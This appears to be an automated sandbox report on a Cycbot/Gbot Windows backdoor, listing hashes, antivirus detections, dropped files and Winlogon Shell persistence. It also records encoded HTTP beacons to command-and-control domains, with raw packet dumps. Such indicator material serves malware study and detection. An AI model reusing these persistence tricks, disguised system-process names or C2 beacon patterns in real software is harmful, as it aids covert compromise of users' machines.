Analysis Date2014-11-12 22:59:41
MD58b08c822a227ac98057b9c1e7ca5dba1
SHA1aa81356139930a8431135dbfa20b5a7730e7600e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: eaa274d6dc64e858d75c2962f857ca75 sha1: 0b89f69abec0c7016a3616fd553b01c4481fc993 size: 105984
Section.rdata md5: 5e2992e48e1559c4bb4574306ecafb1e sha1: 55cbd09717f9a5f6be7c3e18c0222d082cc1c96d size: 2048
Section.data md5: 5bf88ddee0c939a07bcccb3338adbad1 sha1: 58768b3327563bf0cc41c06fdaf1c5f2ae1fb2c3 size: 61440
Section.isete md5: 4cc2e25cc78cbc6131c5f20d4c1a73ba sha1: eef162f87ee32b945e586d6081c3b620c8c4dd34 size: 1024
Timestamp2005-09-08 13:31:48
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1532
PEhash987e3fa3f6c06702ead174f1df8afabd573f48c1
IMPhashf82362b673c2b7817b29c18cb72f29b4
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.G.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-316
AVDr. WebBackDoor.Gbot.21
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.LZI
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.G.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CMZ
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.aid
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanGen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSbigmusicarchive.com
Winsock DNSfolusho.com
Winsock DNS127.0.0.1
Winsock DNSmoremobileringtons.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSfolusho.com
Type: A
67.222.55.143
DNSzonetf.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSbigmusicarchive.com
Type: A
DNSmoremobileringtons.com
Type: A
HTTP GEThttp://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v81=66&tq=gKZEtzyCELDnCGrYvFlL3NsbW9zA4hp%2FfD6eGEZbEs9ey%2FprQRxcla6PmNBcZmfK6CLCe0gDWVgYWb5HXuIM53cFt58vSkrRenq3AH%2FiEu1%2B2FkUKEyB7JanzosirDW%2BTahn0k%2BgUeD4ajx6y94lz79c%2FDaerqm3gC44CzmmPOSvJdoiX%2FhepyMLbyNJcCmmPI1Uxd%2Ba8lrJMcRyBy1WkZPeNcNMEybymTiiKKPllMVwrI1T3%2F90tWO8epjQrjPDuMGKVhfwQqYKuIbuDOAgMRSNWDW8b8JBuaqzaL4hGo9BcFLprGGCJ0i58Pu3bmSUwmVHhwihPuL8%2FmOu4PXCrkHoa40ryJxk6XPtx2jZzjKidUrjxT8I8LIC2jv%2FpMuZWWgNUIFw6vDd%2F2qyg388CRtvZ7nbIYRbKLRQQMQNr79Ut1UCLmgGGe%2BXL
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 67.222.55.143:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30392f   uploads/2010/09/
0x00000020 (00032)   7765622d 32302d77 6861742d 69732d33   web-20-what-is-3
0x00000030 (00048)   30307832 35312e6a 70673f76 38313d36   00x251.jpg?v81=6
0x00000040 (00064)   36267471 3d674b5a 45747a79 43454c44   6&tq=gKZEtzyCELD
0x00000050 (00080)   6e434772 5976466c 4c334e73 6257397a   nCGrYvFlL3NsbW9z
0x00000060 (00096)   41346870 25324666 44366547 455a6245   A4hp%2FfD6eGEZbE
0x00000070 (00112)   73396579 25324670 72515278 636c6136   s9ey%2FprQRxcla6
0x00000080 (00128)   506d4e42 635a6d66 4b36434c 43653067   PmNBcZmfK6CLCe0g
0x00000090 (00144)   44575667 59576235 48587549 4d353363   DWVgYWb5HXuIM53c
0x000000a0 (00160)   46743538 76536b72 52656e71 33414825   Ft58vSkrRenq3AH%
0x000000b0 (00176)   32466945 75312532 4232466b 554b4579   2FiEu1%2B2FkUKEy
0x000000c0 (00192)   42374a61 6e7a6f73 69724457 25324254   B7JanzosirDW%2BT
0x000000d0 (00208)   61686e30 6b253242 67556544 34616a78   ahn0k%2BgUeD4ajx
0x000000e0 (00224)   36793934 6c7a3739 63253246 44616572   6y94lz79c%2FDaer
0x000000f0 (00240)   716d3367 43343443 7a6d6d50 4f53764a   qm3gC44CzmmPOSvJ
0x00000100 (00256)   646f6958 25324668 6570794d 4c62794e   doiX%2FhepyMLbyN
0x00000110 (00272)   4a63436d 6d504931 55786425 32426138   JcCmmPI1Uxd%2Ba8
0x00000120 (00288)   6c724a4d 63527942 7931576b 5a50654e   lrJMcRyBy1WkZPeN
0x00000130 (00304)   634e4d45 7962796d 5469694b 4b506c6c   cNMEybymTiiKKPll
0x00000140 (00320)   4d567772 49315433 25324639 3074574f   MVwrI1T3%2F90tWO
0x00000150 (00336)   3865706a 51726a50 44754d47 4b566866   8epjQrjPDuMGKVhf
0x00000160 (00352)   77517159 4b754962 75444f41 674d5253   wQqYKuIbuDOAgMRS
0x00000170 (00368)   4e574457 3862384a 42756171 7a614c34   NWDW8b8JBuaqzaL4
0x00000180 (00384)   68476f39 4263464c 70724747 434a3069   hGo9BcFLprGGCJ0i
0x00000190 (00400)   35385075 33626d53 55776d56 48687769   58Pu3bmSUwmVHhwi
0x000001a0 (00416)   6850754c 38253246 6d4f7534 50584372   hPuL8%2FmOu4PXCr
0x000001b0 (00432)   6b486f61 34307279 4a786b36 58507478   kHoa40ryJxk6XPtx
0x000001c0 (00448)   326a5a7a 6a4b6964 55726a78 54384938   2jZzjKidUrjxT8I8
0x000001d0 (00464)   4c494332 6a762532 46704d75 5a575767   LIC2jv%2FpMuZWWg
0x000001e0 (00480)   4e554946 77367644 64253246 32717967   NUIFw6vDd%2F2qyg
0x000001f0 (00496)   33383843 5274765a 376e6249 5952624b   388CRtvZ7nbIYRbK
0x00000200 (00512)   4c525151 4d514e72 37395574 3155434c   LRQQMQNr79Ut1UCL
0x00000210 (00528)   6d674747 65253242 584c2048 5454502f   mgGGe%2BXL HTTP/
0x00000220 (00544)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000230 (00560)   20636c6f 73650d0a 486f7374 3a20666f    close..Host: fo
0x00000240 (00576)   6c757368 6f2e636f 6d0d0a41 63636570   lusho.com..Accep
0x00000250 (00592)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000260 (00608)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000270 (00624)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a50 44754d47 4b566866   ose....PDuMGKVhf
0x00000160 (00352)   77517159 4b754962 75444f41 674d5253   wQqYKuIbuDOAgMRS
0x00000170 (00368)   4e574457 3862384a 42756171 7a614c34   NWDW8b8JBuaqzaL4
0x00000180 (00384)   68476f39 4263464c 70724747 434a3069   hGo9BcFLprGGCJ0i
0x00000190 (00400)   35385075 33626d53 55776d56 48687769   58Pu3bmSUwmVHhwi
0x000001a0 (00416)   6850754c 38253246 6d4f7534 50584372   hPuL8%2FmOu4PXCr
0x000001b0 (00432)   6b486f61 34307279 4a786b36 58507478   kHoa40ryJxk6XPtx
0x000001c0 (00448)   326a5a7a 6a4b6964 55726a78 54384938   2jZzjKidUrjxT8I8
0x000001d0 (00464)   4c494332 6a762532 46704d75 5a575767   LIC2jv%2FpMuZWWg
0x000001e0 (00480)   4e554946 77367644 64253246 32717967   NUIFw6vDd%2F2qyg
0x000001f0 (00496)   33383843 5274765a 376e6249 5952624b   388CRtvZ7nbIYRbK
0x00000200 (00512)   4c525151 4d514e72 37395574 3155434c   LRQQMQNr79Ut1UCL
0x00000210 (00528)   6d674747 65253242 584c2048 5454502f   mgGGe%2BXL HTTP/
0x00000220 (00544)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000230 (00560)   20636c6f 73650d0a 486f7374 3a20666f    close..Host: fo
0x00000240 (00576)   6c757368 6f2e636f 6d0d0a41 63636570   lusho.com..Accep
0x00000250 (00592)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000260 (00608)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000270 (00624)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a50 44754d47 4b566866   .......PDuMGKVhf
0x00000160 (00352)   77517159 4b754962 75444f41 674d5253   wQqYKuIbuDOAgMRS
0x00000170 (00368)   4e574457 3862384a 42756171 7a614c34   NWDW8b8JBuaqzaL4
0x00000180 (00384)   68476f39 4263464c 70724747 434a3069   hGo9BcFLprGGCJ0i
0x00000190 (00400)   35385075 33626d53 55776d56 48687769   58Pu3bmSUwmVHhwi
0x000001a0 (00416)   6850754c 38253246 6d4f7534 50584372   hPuL8%2FmOu4PXCr
0x000001b0 (00432)   6b486f61 34307279 4a786b36 58507478   kHoa40ryJxk6XPtx
0x000001c0 (00448)   326a5a7a 6a4b6964 55726a78 54384938   2jZzjKidUrjxT8I8
0x000001d0 (00464)   4c494332 6a762532 46704d75 5a575767   LIC2jv%2FpMuZWWg
0x000001e0 (00480)   4e554946 77367644 64253246 32717967   NUIFw6vDd%2F2qyg
0x000001f0 (00496)   33383843 5274765a 376e6249 5952624b   388CRtvZ7nbIYRbK
0x00000200 (00512)   4c525151 4d514e72 37395574 3155434c   LRQQMQNr79Ut1UCL
0x00000210 (00528)   6d674747 65253242 584c2048 5454502f   mgGGe%2BXL HTTP/
0x00000220 (00544)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000230 (00560)   20636c6f 73650d0a 486f7374 3a20666f    close..Host: fo
0x00000240 (00576)   6c757368 6f2e636f 6d0d0a41 63636570   lusho.com..Accep
0x00000250 (00592)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000260 (00608)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000270 (00624)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7856 4b763937 35586c6d   X%2BSNxVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a72202f 3e0a2020   ose......r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e765825 32425039 68253242 49307344   NvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a745825 3242534e 78723579 676d3143   JtX%2BSNxr5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a517159 4b754962 75444f41 674d5253   .QqYKuIbuDOAgMRS
0x00000170 (00368)   4e574457 3862384a 42756171 7a614c34   NWDW8b8JBuaqzaL4
0x00000180 (00384)   68476f39 4263464c 70724747 434a3069   hGo9BcFLprGGCJ0i
0x00000190 (00400)   35385075 33626d53 55776d56 48687769   58Pu3bmSUwmVHhwi
0x000001a0 (00416)   6850754c 38253246 6d4f7534 50584372   hPuL8%2FmOu4PXCr
0x000001b0 (00432)   6b486f61 34307279 4a786b36 58507478   kHoa40ryJxk6XPtx
0x000001c0 (00448)   326a5a7a 6a4b6964 55726a78 54384938   2jZzjKidUrjxT8I8
0x000001d0 (00464)   4c494332 6a762532 46704d75 5a575767   LIC2jv%2FpMuZWWg
0x000001e0 (00480)   4e554946 77367644 64253246 32717967   NUIFw6vDd%2F2qyg
0x000001f0 (00496)   33383843 5274765a 376e6249 5952624b   388CRtvZ7nbIYRbK
0x00000200 (00512)   4c525151 4d514e72 37395574 3155434c   LRQQMQNr79Ut1UCL
0x00000210 (00528)   6d674747 65253242 584c2048 5454502f   mgGGe%2BXL HTTP/
0x00000220 (00544)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000230 (00560)   20636c6f 73650d0a 486f7374 3a20666f    close..Host: fo
0x00000240 (00576)   6c757368 6f2e636f 6d0d0a41 63636570   lusho.com..Accep
0x00000250 (00592)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000260 (00608)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000270 (00624)   0a0d0a                                ...


Strings
QT.Z..I
.i...
B..
../.
yd"I
..9..es.C.G....
..~...
.....n........7f.TI1.
....5.'.g
.!
t1..4I...q..q
,.(5..
..i`l
..
n
.:

040904b0
1.0.0.3
1532
"apA
 AR#
AsQR
drQer
F%E!
FileVersion
FsC!
GB& 
gDg%
"gfR
@g&sF
jjjjjj
PrivateBuild
ProductVersion
R3a2
S1ge@
`sB'
StringFileInfo
TIMES NEW ROMAN
Translation
v%3S
VarFileInfo
VS_VERSION_INFO
/$??#+
0$l+,U
2<8p<e
2HD~{&}
.+3O`jLS%
42BV <
(^48L+0QF.
5)I%#J
5{"j4-C
>5l`~_
{%7"[;F
7.G|+g
7k;)ZM
9E-Aq4
9g*cEYd
{9-u	u
A8b*Vf#
ADVAPI32.dll
"?~at"
B63hu^T
*B89~OH-
bJ(06i
Bv+>I*?P"zO
C[9dfl
CBzako
CharNextW
CharUpperW
c`le|H
CoCreateInstance
CoInitialize
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
CreateFileMappingW
CreateStdAccessibleObject
/%*CR-kf
cys,vT
@.data
DispatchMessageW
$D{iU(\"
D(^Rkc;
dy~ln	vB'
E(/$I2
-E$`kN
EnumResourceNamesA
f~CZV4
FillConsoleOutputCharacterA
FindClose
fj=jq 
]fP%R-2
FreeEnvironmentStringsW
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetProcessWorkingSetSize
GetTickCount
GlobalAlloc
GlobalFree
g`-=Vv
!g@w$g
hly;_~5
H'|PMw1
%{^HVu	
iBo>Vo
iHx\<r
InitializeCriticalSection
.isete
I*,/XY
i(YWw 
_`J4DU
_j|5:i
-JbJj_
jfAf/j
[j<Iz6
:~JRR6
